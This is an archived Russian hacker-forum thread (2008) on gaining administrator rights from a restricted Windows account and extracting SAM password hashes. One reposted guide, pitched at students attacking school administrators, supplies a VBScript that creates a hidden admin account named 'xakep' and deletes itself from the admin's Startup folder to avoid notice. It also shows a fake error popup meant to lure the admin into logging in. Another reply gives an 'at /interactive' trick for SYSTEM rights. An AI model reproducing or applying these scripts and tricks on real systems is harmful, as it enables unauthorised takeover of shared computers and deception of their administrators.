Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Вопрос про:Повышение привелегий в Windows

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Прочее] >> Вопрос про:Повышение привелегий в Windows
Имя
Сообщение << Старые топики   Новые топики >>
Вопрос про:Повышение привелегий в Windows - 2008-07-25 03:41:00.026666   
xaxa89

Сообщений: 287
Оценки: 0
Присоединился: 2008-05-18 00:30:38.240000
Как повысить привелегии от учетной записи с ограничеными правами до администратора?
Как выташить пароли из SAM базы?нужны ли для того что б ее скопировать какие то программы или права System в системе?
Post #: 1
RE: Вопрос про:Повышение привелегий в Windows - 2008-07-25 10:24:54.153333   
NuRiG

Сообщений: 27
Оценки: 0
Присоединился: 2007-09-28 11:16:09.860000
Run -> cmd
at <time> /interactive "cmd"

когда откроется консоль убей процесс explorer и запусти его из консоли

в итоге получаем права SYSTEM

Get SAM:
Tools
Post #: 2
RE: Вопрос про:Повышение привелегий в Windows - 2008-07-25 11:00:05.356666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
Прива вам школьники и студенты! Я хочу дать вам несколько полезных советов к началу учебного года. Я более чем уверен, что вас уже достала ваша учетная запись с ограниченными правами на виндах 2k NT или XP и вам хочется больше, намного больше! В вашем учебном заведении наверняка есть злые дядьки, которых называют админами, и только эти негодяи знают пассы на элитные учетные записи. Просто падонки, не правда ли? Мы это исправим, более того, мы их свергнем, а вы будете новым королём с большими привилегиями.

Итак, что нам для этого нужно? Лишь 5-10 минут провести за нужным нам компом, что бы на нём был хотя бы один текстовый редактор и целый запас желания получить админскую учетку. Весь этот способ основан на WSH, лучшего пожалуй средсвта для компьютерного западла в виндах (смотри ][ 36 выпуск!). Ни для кого не секрет, что админы логятся на тачках со своей учетной записью (да часто с таким гордым видом)… От этого и будем плясать. Сначала нам потребуется написать простой скриптик "Действия I (урвать хоть что-нибудь)".

Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user xakep 1111 /add", True)
\\\ тут мы добавляем юзера xakep c паролем 1111
Call helo("C:\windows\system32\net.exe localgroup Администраторы xakep /add", True)
\\\ тут наш юзер становится настоящим админом !!!

и назовем наше творение admin.vbs.

Да всё это просто замечательно, только прав у нас маловато. А вот прав админчика нам как раз хватит, поскольку ключ реестра HKEY_LOCAL_MACHINE нам не доступен у нас не получится заставить грузится этот скрипт у всех юзеров. А зачем нам лишние заморочки, мы будем делать проще, мы просто откроем путь c:\Documents and Settings\Администратор\Главное меню\Программы\Автозагрузка\ и нежно и аккуратно положим туда наш скрипт. Тут возникает другой вопрос - а вдруг админ его заметит… Не заметит, в конце скрипта добавляем следующее:

Set Killer=CreateObject("Scripting.FileSystemObject")
Killer.DeleteFile(" C:\Documents and Settings\Администратор\ Главное меню\Программы\Автозагрузка\ admin.vbs")

(главное помнить, что админ может использовать не встроенную учетную запись "Администратор", а что-нибудь поудобнее, но я вас уверяю, с правами он себя никогда не обделит). И после того, как админ войдёт в систему под своим аккаунтом все дело будет сделано, а как заставить его это сделать я расскажу в конце. Итак, собственный админский аккаунт у нас уже есть, но что мешает настоящему админу его удалить… Это тоже поправимо, делаем следующее.

Заходим в командную строку и набиваем "net localgroup Администраторы" - смотрим кто же у нас имеет права админить, записываем или запоминаем… Действие II ( прощай админ, не поминай лихом). Пишем примерно такой же скрипт ;

Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user Администратор 1111 /add", True)

Действие III (админ иди работай)

Теперь как же быть с толстыми и ленивыми админами, которым влом хотя бы раз в неделю проверить комп? Их придётся заставить тащить свою задницу к тачке и логинится адинской записью. Надо так надо… К примеру пусть выскакивает мессага о какой-нибудь злой ошибке (это я полностью украду из их журнала выпуска 36) - тоже небольшой скриптик, который мы поместим в реестре на этот раз:

Hacker = MsgBox("тут вы впишите чтонибудь заумное и страшное например "Explorer.exe не может получить доступ к памяти 0x77e626ba", 20, "System error")

==============================================================
(с) Wilderwind
Post #: 3
RE: Вопрос про:Повышение привелегий в Windows - 2008-07-28 12:18:44.453333   
Угрюмый

Сообщений: 24
Оценки: 0
Присоединился: 2006-09-11 02:22:29

quote:

ORIGINAL: NuRiG

Run -&gt; cmd
at &lt;time&gt; /interactive "cmd"

когда откроется консоль убей процесс explorer и запусти его из консоли

в итоге получаем права SYSTEM

Get SAM:
Tools



Этот номер проканает ТОЛЬКО из-под "админа".
А речь идет о "повышении привелегий от учетной записи с ограничеными правами до администратора".
Так что - не в тему! [&o]
Post #: 4
RE: Вопрос про:Повышение привелегий в Windows - 2008-07-28 14:28:00   
WhiTe_ZeRo

Сообщений: 11
Оценки: 0
Присоединился: 2008-07-28 00:31:02.330000
Pashkela, твой способ не всегда сможет работать, т.к. с учётной записи не получиться пройти в c:\Documents and Settings\Администратор\Главное меню\Программы\Автозагрузка\
Post #: 5
RE: Вопрос про:Повышение привелегий в Windows - 2008-07-28 17:42:11.136666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
Это не мой способ (смотри копирайт). Свой я вам не скажу. Только за wmz
Post #: 6
RE: Вопрос про:Повышение привелегий в Windows - 2008-08-01 04:12:41.850000   
xaxa89

Сообщений: 287
Оценки: 0
Присоединился: 2008-05-18 00:30:38.240000

quote:

ORIGINAL: Pashkela

Это не мой способ (смотри копирайт). Свой я вам не скажу. Только за wmz

алчность ни есть хорошо……мож хотя б в общих чертах распишешь…….
Post #: 7
RE: Вопрос про:Повышение привелегий в Windows - 2008-08-01 13:51:03.650000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
http://forum.antichat.ru/thread78394.html

http://www.cyber39.ru/2008/05/13/povyshenie_privilegijj_v_microsoft_windows.html

http://www.xakep.ru/post/32151/default.asp

Post #: 8
RE: Вопрос про:Повышение привелегий в Windows - 2008-08-04 15:07:40.653333   
WinLinux

Сообщений: 491
Оценки: 0
Присоединился: 2008-07-18 14:06:33.563333
А что делать если на Винде SP3 и файловая система NTFS ??? Так как твоя фишка повышения привелегий работает только под FAT32…
Post #: 9
Страниц:  [1]
Все форумы >> [Прочее] >> Вопрос про:Повышение привелегий в Windows







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.